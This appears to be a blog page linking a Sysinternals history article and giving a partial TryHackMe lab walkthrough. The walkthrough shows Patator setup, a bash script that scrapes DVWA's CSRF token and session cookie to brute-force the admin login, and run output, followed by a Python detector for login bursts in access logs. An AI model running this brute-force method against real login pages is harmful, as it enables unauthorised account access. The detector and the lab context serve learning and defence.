
  • Sysinternals Talk

    Just ran into this great post on the SentinelOne website on the history of the Sysinternals suite by none other than its creator – Mark Russinovich.

    https://www.sentinelone.com/labs/the-life-and-times-of-sysinternals-how-one-developer-changed-the-face-of-malware-analysis/
  • TryHackMe Brute Force Heroes Partial Writeup – Trouble with Patator

    I was doing the TryHackMe Brute Force Heroes room and came across the Patator brute forcing tool. Getting it to successfully brute force the DVWA application was quite a feat for me, which led me to write this post.

    I am using my own Kali Linux attack box. These instructions may not apply if you use the THM Attack Box.

    Contrary to what the Task instructions say, I was able to get Python 3 to work pretty well with the patator tool. Using Python 2 led to a bunch of issues and wasted time.

    # create a Python 3 virtual env
    $ python3 -m venv env3

    # activate env3
    $ source env3/bin/activate
    (env3) $

    # install pycurl
    (env3) $ pip install pycurl

    # test pycurl
    (env3) $ python
    Python 3.11.2 (main, Mar 13 2023, 12:18:29) [GCC 12.2.0] on linux
    Type "help", "copyright", "credits" or "license" for more information.
    >>> import pycurl
    >>>

    # Make a local copy of patator and remove the shebang line so it runs under the python version installed in the environment

    # REMOVE THIS LINE
    #!/usr/bin/python2

    # Run Patator

    (env3) $ ./patatol http_fuzz method=POST url=http://$TARGET/login.php body="username=admin&password=password&Login=Login&user_token=f9e590fd1a2070c99d99e3e8a563c180" header="Cookie: PHPSESSID=0b7gcem4r4mqugpuh7bf21hfmd; security=impossible" -x quit:fgrep!=login.php
    /home/kali/tryhackme/Rooms/bruteforceheroes/./patatol:2601: DeprecationWarning: 'telnetlib' is deprecated and slated for removal in Python 3.13
      from telnetlib import Telnet
    <class '__main__.Controller_HTTP'>
    13:08:45 patator    INFO - Starting Patator 0.9 (https://github.com/lanjelot/patator) with python-3.11.2 at 2023-04-23 13:08 EDT
    13:08:46 patator    INFO -
    13:08:46 patator    INFO - code size:clen       time | candidate                          |   num | mesg
    13:08:46 patator    INFO - -------------------------------------------------------
    13:08:47 patator    FAIL - xxx  70:-1          1.064 |                                    |     1 | <class 'pycurl.error'> (49, "Couldn't parse CURLOPT_RESOLVE entry ''")
    13:08:48 patator    INFO - Hits/Done/Skip/Fail/Size: 0/1/0/1/1, Avg: 0 r/s, Time: 0h 0m 2s

    Add the following dummy option to the command line to get past the above error.

    resolve=target:127.0.0.1
    
    e.g. ./patator http_fuzz method=POST resolve=target:127.0.0.1 url="http://${IP}/login.php" 
    

    We learned from the Burp discussion that the response to a failed login carries the header Location: login.php, while the response to a successful login carries Location: index.php. We use this to exclude (ignore) every response whose Location: header contains login.php.

    The following switch excludes the failed login responses.

    -x ignore:fgrep='Location: login.php'

    THE FINAL SCRIPT (as outlined in the Brute Forcing Patator Task)

    #!/bin/bash
    # DVWA host (placeholder). No spaces around '=' here: with "IP= x.x.x.x" bash
    # would try to run x.x.x.x as a command and leave IP empty.
    IP=x.x.x.x

    # Fetch the login page once, saving the session cookie to dvwa.cookie, and pull
    # the CSRF token out of the user_token hidden field
    CSRF=$(curl -s -c dvwa.cookie "${IP}/login.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2)

    # The cookie jar is in Netscape format; the 7th whitespace-separated field is the cookie value
    SESSIONID=$(grep PHPSESSID dvwa.cookie | awk -F ' ' '{print $7}')

    echo "The CSRF is: $CSRF"
    echo "The PHPSESSID is: $SESSIONID"

    patator http_fuzz method=POST --threads=64 timeout=10 url="http://${IP}/login.php" 0=passwords.txt body="username=admin&password=FILE0&Login=Login&user_token=${CSRF}" header="Cookie: PHPSESSID=${SESSIONID}; security=impossible" resolve=target:127.0.0.1 -x quit:fgrep!=login.php -x ignore:fgrep='Location: login.php'

    THE CRACKED PASSWORD

    $ ./run.sh
    The CSRF is: cb8eb6397fd783c9362188fe68ee0049
    The PHPSESSID is: cudu1518ggt4s1c7es4l4uodg3
    /home/kali/tryhackme/Rooms/bruteforceheroes/./patator:2601: DeprecationWarning: 'telnetlib' is deprecated and slated for removal in Python 3.13
      from telnetlib import Telnet
    <class '__main__.Controller_HTTP'>
    06:23:37 patator    INFO - Starting Patator 0.9 (https://github.com/lanjelot/patator) with python-3.11.2 at 2023-04-23 06:23 EDT
    06:23:37 patator    INFO -
    06:23:37 patator    INFO - code size:clen       time | candidate                          |   num | mesg
    06:23:37 patator    INFO - -------------------------------------------------------
    06:23:44 patator    INFO - 302  281:0          0.217 | [PASSWORD]                           |   807 | HTTP/1.1 302 Found
    06:23:45 patator    INFO - Hits/Done/Skip/Fail/Size: 1/1136/0/0/1988, Avg: 148 r/s, Time: 0h 0m 7s
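    The run above pushed 1136 login attempts through in 7 seconds (148 r/s). On the defending side, that volume stands out plainly in the web server's access log. The following Python script is an added example for this writeup, not code from Patator, DVWA or TryHackMe: it parses combined-format access log lines, keeps a per-client sliding window of POSTs to /login.php, and reports any client that exceeds a threshold inside that window. The log lines, IP addresses and timestamps are constructed, and the window length and attempt threshold are assumptions to tune per site.

```python
"""Detect a login brute-force burst in web-server access logs.

Added example for this writeup (not Patator, DVWA or TryHackMe code).
The sample log lines are constructed; WINDOW_SECONDS and MAX_ATTEMPTS
are assumed thresholds to tune for a real site.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

LOGIN_PATH = "/login.php"
WINDOW_SECONDS = 10   # sliding window length in seconds (assumption)
MAX_ATTEMPTS = 20     # login POSTs per client inside one window that trigger an alert (assumption)

# Apache/nginx combined format:
# ip - - [time] "METHOD PATH PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return the fields we need from one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "time": datetime.strptime(m.group("time"), TIME_FMT),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],   # drop any query string
        "status": int(m.group("status")),
    }


def detect_bursts(lines, window=WINDOW_SECONDS, max_attempts=MAX_ATTEMPTS):
    """Return {ip: (peak_attempts_in_one_window, total_attempts)} for every client
    that sent more than max_attempts POSTs to LOGIN_PATH within any window-second span.
    Lines are assumed to be in time order, as a server writes them."""
    recent = defaultdict(deque)   # ip -> timestamps of login POSTs still inside the window
    peak = defaultdict(int)
    total = defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != LOGIN_PATH:
            continue
        ip, ts = rec["ip"], rec["time"]
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window:   # expire entries older than the window
            q.popleft()
        total[ip] += 1
        peak[ip] = max(peak[ip], len(q))
    return {ip: (peak[ip], total[ip]) for ip in peak if peak[ip] > max_attempts}


def build_sample_log():
    """Constructed access-log lines: one ordinary user and one brute-force burst."""
    fmt = ('{ip} - - [23/Apr/2023:06:23:{sec:02d} -0400] "{method} {path} HTTP/1.1" '
           '{status} 281 "-" "curl/7.88.1"')
    lines = [
        # ordinary user: loads the form, then two login attempts seconds apart
        fmt.format(ip="10.0.0.7", sec=1, method="GET", path="/login.php", status=200),
        fmt.format(ip="10.0.0.7", sec=5, method="POST", path="/login.php", status=302),
        fmt.format(ip="10.0.0.7", sec=9, method="POST", path="/login.php", status=302),
    ]
    # brute-force burst: 60 login POSTs spread over three seconds from one client
    for i in range(60):
        lines.append(fmt.format(ip="10.0.0.5", sec=20 + i // 20, method="POST",
                                path="/login.php", status=302))
    return lines


if __name__ == "__main__":
    for ip, (peak_n, total_n) in detect_bursts(build_sample_log()).items():
        print(f"ALERT {ip}: {peak_n} login POSTs within {WINDOW_SECONDS}s (total {total_n})")
```

    Access logs record the status code but not the Location header, so this rule cannot separate a failed login from a successful one the way the -x ignore:fgrep='Location: login.php' filter does on the attacking side; both return 302 here. To alert on "many failures followed by one success" from the same client, feed the application's own authentication log into the same window logic instead.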

    REFERENCES: